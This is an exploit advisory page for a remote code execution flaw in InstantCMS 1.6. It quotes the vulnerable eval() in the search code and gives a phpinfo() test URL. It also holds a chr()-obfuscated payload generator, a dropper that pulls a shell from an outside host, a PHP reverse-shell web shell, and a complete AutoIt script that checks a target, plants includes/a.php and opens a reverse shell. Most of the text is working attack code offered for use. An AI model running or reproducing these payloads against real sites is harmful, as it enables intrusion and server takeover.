InstantCMS 1.6 Code Execution

2013.06.27
Credit: AkaStep
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#NoTrayIcon #Region ;**** Directives created by AutoIt3Wrapper_GUI **** #AutoIt3Wrapper_Outfile=exploit.exe #AutoIt3Wrapper_UseUpx=n #AutoIt3Wrapper_Change2CUI=y #EndRegion ;**** Directives created by AutoIt3Wrapper_GUI **** #include <Inet.au3> #include <String.au3> #cs Demo vid: http://youtu.be/j_RIPh-nYpY Print Screen: http://s34-temporary-files.radikal.ru/a9d69c791f054e7f9c9bd469fc0b43fd/-929206895.png Download: http://www.instantcms.ru/load/url=/download/instantCMS_20100515_v1.6.2.zip Or: http://www.instantcms.ru/download.html Dork: InstantCMS &#169; 2007-2010 In Wild i found 1.7 versions too which is vulnerable too. <?php //instantCMS_20100515_v1.6.2.zip/components/search/frontend.php /*********************************************************************************************/ // // // InstantCMS v1.6 (c) 2010 FREEWARE // // http://www.instantcms.ru/, info@instantcms.ru // // // // written by Vladimir E. Obukhov, 2007-2010 // // // /*********************************************************************************************/ // SNIP// if ($look == 'phrase'){ $against .= '\"'.$query.'\"'; } //RUN SEARCH PROCESSORS //get list of components and look for search processor in component folder $sql = "SELECT link FROM cms_components"; $rs = $inDB->query($sql) ; if ($inDB->num_rows($rs)){ while ($component = $inDB->fetch_assoc($rs)){ $spfile = $_SERVER['DOCUMENT_ROOT'].'/components/'.$component['link'].'/psearch.php'; if (file_exists($spfile)){ if (in_array($component['link'], $cfg['comp'])){ include $spfile; eval('search_'.$component['link'].'("'.$against.'", "'.$look.'", "'.$mode.'");'); } } } } // EOF SNIP // Notice: eval() cunstruction. Exploitation: Payload: ${echo phpinfo()} site.tld/index.php?view=search&query=${echo phpinfo()}&look=allwords Drop shell?NP. ======================================================================================= <?php /* Simple Payload generator */ $str='http://search.tld/andfind.txt';//shell url. you'll drop it from server which is in under your control.// echo '<pre>' . PHP_EOL; for($z=0;$z<=strlen($str)-1;$z++) { $z==strlen($str)-1 ? $plg='chr(' . ord(substr($str,$z,1)) .')' : $plg='chr(' . ord(substr($str,$z,1)) .')' . '.';echo $plg; }?> ======================================================================================= Then drop it using the following way: ${echo file_put_contents(PAYLOAD1,file_get_contents(PAYLOAD2))} As reverse shell uses: <?php error_reporting(0); set_time_limit(0); $ip=trim((string)$_SERVER['REMOTE_ADDR']); $port=preg_replace('/[^0-9]/i','',(string)$_SERVER['HTTP_USER_AGENT']); if (empty($port)){ die('<!-- Welcome BH -->');} $socket=socket_create(AF_INET,SOCK_STREAM,SOL_TCP);$responce=socket_connect($socket,$ip,$port); $hello.=PHP_EOL . 'W00T: ';socket_write($socket,$hello,strlen($hello)); while($alive=@socket_read($socket, 31337)) {$responce=`$alive`;$responce.=PHP_EOL .'W00T: ';socket_write($socket,$responce,strlen($responce));}socket_close($socket); #ce $msg_usage="Command Line Plizzzz => " & @CRLF & "Usage: " & @ScriptName & ' http://site.tld' & ' yournetcatport' & @CRLF $fakeua='Mozilla/ (compatible; MSIE ; Windows NT ; WOW Trident/) '; $vulnurl='/index.php?view=search&query=Shoutz)&look=allwords'; $kissyou='${echo file_put_contents(chr(105).chr(110).chr(99).chr(108).chr(117).chr(100).chr(101).chr(115).chr(47).chr(97).chr(46).chr(112).chr(104).chr(112),file_get_contents(chr(104).chr(116).chr(116).chr(112).chr(58).chr(47).chr(47).chr(119).chr(119).chr(119).chr(46).chr(104).chr(101).chr(121).chr(112).chr(97).chr(115).chr(116).chr(101).chr(105).chr(116).chr(46).chr(99).chr(111).chr(109).chr(47).chr(100).chr(111).chr(119).chr(110).chr(108).chr(111).chr(97).chr(100).chr(47).chr(48).chr(86).chr(49).chr(56)))}'; $pissagainst_wind='<!-- Welcome BH -->'; $triptrop=@CRLF & _StringRepeat('#',62) & @CRLF; #cs ConsoleWrite('debug ' & StringReplace($vulnurl,'Shoutz)','${echo phpinfo()}')); exit; #ce ConsoleWrite($triptrop & '# instantCMS_20100515_v1.6.2 PHP Code Execution Exploit # ' & @CRLF & _ '# *Via Reverse Shell* #' & @CRLF & _ '# Usage: ' & @ScriptName & ' http://site.tld' & ' yournetcatport #' & @CRLF & _ '# /AkaStep #' & $triptrop) if $CmdLine[0] <> 2 Then ;ConsoleWrite(@CRLF & _StringRepeat('#',62) & @CRLF & $msg_usage & @CRLF & _StringRepeat('#',62) & @CRLF); MsgBox(64,"",$msg_usage); exit; EndIf $rsite=$CmdLine[1]; $PayloadUA=$CmdLine[2]; ConsoleWrite($triptrop & '[+] Verifying vulnerability [+]' & $triptrop); HttpSetUserAgent($fakeua); $isvulnerable=_INetGetSource($rsite & StringReplace($vulnurl,'Shoutz)','${echo phpinfo()}'),True); if StringInStr($isvulnerable,'allow_url_fopen') Then ConsoleWrite($triptrop & '[+] WoHoo! Remote Site Is vulnerable! [+]' & $triptrop); Else ConsoleWrite($triptrop & '[-] Sorry Dude:( Not vulnerable:( [-]' & $triptrop); exit; EndIf #cs Time To get reversel shell! First we'll drop our shell as includes/a.php Then we'll check for shell existense. If exists then we'll try bc to us. ${echo file_put_contents(chr(105).chr(110).chr(99).chr(108).chr(117).chr(100).chr(101).chr(115).chr(47).chr(97).chr(46).chr(112).chr(104).chr(112),file_get_contents(chr(104).chr(116).chr(116).chr(112).chr(58).chr(47).chr(47).chr(119).chr(119).chr(119).chr(46).chr(104).chr(101).chr(121).chr(112).chr(97).chr(115).chr(116).chr(101).chr(105).chr(116).chr(46).chr(99).chr(111).chr(109).chr(47).chr(100).chr(111).chr(119).chr(110).chr(108).chr(111).chr(97).chr(100).chr(47).chr(48).chr(86).chr(49).chr(56)))}&look=allwords #ce #cs EXPLOITING! #ce HttpSetUserAgent($fakeua) InetGet($rsite & StringReplace($vulnurl,'Shoutz)',$kissyou),'',1) sleep(Random(1500,3000,1));//random sleep for few seconds #cs Now checking for existence of our dropped shell. #ce HttpSetUserAgent($fakeua) $dont=_INetGetSource($rsite & '/includes/a.php',True) if StringInStr($dont,$pissagainst_wind) Then ConsoleWrite($triptrop & '[+] Seems We Are going To Travel xD! [+]' & $triptrop) Else ConsoleWrite($triptrop & "[+] Can't find Shell! Try to exploit Manually! [+]" & $triptrop); exit; EndIf #cs And Finally Getting Reverse Shell #ce HttpSetUserAgent($PayloadUA) InetGet($rsite & '/includes/a.php','',1,1) ConsoleWrite($triptrop & "[+] Happy Travel! [+]" & $triptrop); exit; #cs ================================================ KUDOSSSSSSS ================================================ packetstormsecurity.org packetstormsecurity.com packetstormsecurity.net securityfocus.com cxsecurity.com security.nnov.ru securtiyvulns.com securitylab.ru secunia.com securityhome.eu exploitsdownload.com osvdb.com websecurity.com.ua 1337day.com itsecuritysolutions.org waraxe.us exploit-db.com insecurety.net ================================================ /AkaStep #ce

References:

http://s34-temporary-files.radikal.ru/a9d69c791f054e7f9c9bd469fc0b43fd/-929206895.png
http://www.instantcms.ru/load/url=/download/instantCMS_20100515_v1.6.2.zip


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top